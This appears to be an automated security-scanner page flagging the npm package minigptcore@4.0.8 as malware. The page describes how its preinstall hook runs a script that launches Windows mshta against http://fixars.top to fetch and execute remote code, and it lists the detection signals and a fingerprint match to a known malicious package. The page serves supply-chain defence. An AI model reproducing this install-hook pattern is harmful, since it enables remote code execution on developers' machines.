registry  /  minigptcore  /  4.0.8

minigptcore@4.0.8

Node.js wrapper for GPTMini API service.

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Installing the package automatically launches Windows `mshta` against a remote HTTP host. The fetched remote content can execute in the installer user's context.

Static reason
One or more suspicious static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
npm install triggers the `preinstall` lifecycle hook.
Impact
Remote code execution during dependency installation; remote payload can change without a package update.
Mechanism
preinstall shell execution of remotely hosted `mshta` payload
Attack narrative
On `npm install`, npm runs `node preinstall.js`. That file invokes `cmd /c` to launch `mshta` against `http://fixars.top`, causing Windows to retrieve and execute remotely supplied script/application content without user consent. This is a concrete install-time remote-code-execution chain, independent of the benign-looking API client source.
Rationale
The package contains an automatic preinstall hook that executes remotely hosted content through `mshta`. This is concrete malicious behavior, not merely a suspicious primitive.
Evidence
package.jsonpreinstall.jsminigptcore.jsREADME.md
Network endpoints1
fixars.top

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `package.json` defines `preinstall: node preinstall.js`.
  • `preinstall.js` imports `child_process.exec`.
  • `preinstall.js` runs `cmd /c` with `mshta http://fixars.top` during installation.
  • `mshta` loads remote script/application content, enabling install-time remote code execution.
Evidence against
  • `minigptcore.js` is a conventional API client and mock implementation.
  • No other package files add mitigating consent or safety controls.
Behavioral surface
Source
ChildProcessNetworkShell
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 2 file(s), 3.95 KB of source, external domains: api.openllm.ai, fixars.top

Source & flagged code

3 flagged · loading source
package.jsonView file
scripts.preinstall = node preinstall.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
scripts.preinstall = node preinstall.js
Medium
Ambiguous Install Lifecycle Script

Install-time lifecycle script is not statically allowlisted and needs review.

package.jsonView on unpkg
preinstall.jsView file
matchType = malicious_source_fingerprint_signature signature = 0aa7860a8556eef0 signatureType = suspicious_hashes sourceLabel = OpenSSF malicious-packages matchedPackage = openllmapi@4.0.2 matchedPath = preinstall.js matchedIdentity = npm:b3BlbmxsbWFwaQ:4.0.2 similarity = 1.000 shingleOverlap = 2 summary = Malicious code in openllmapi (npm)
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

preinstall.jsView on unpkg

Findings

2 High2 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
HighKnown Malware Source Fingerprint Signaturepreinstall.js
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
LowScripts Present
LowUrl Strings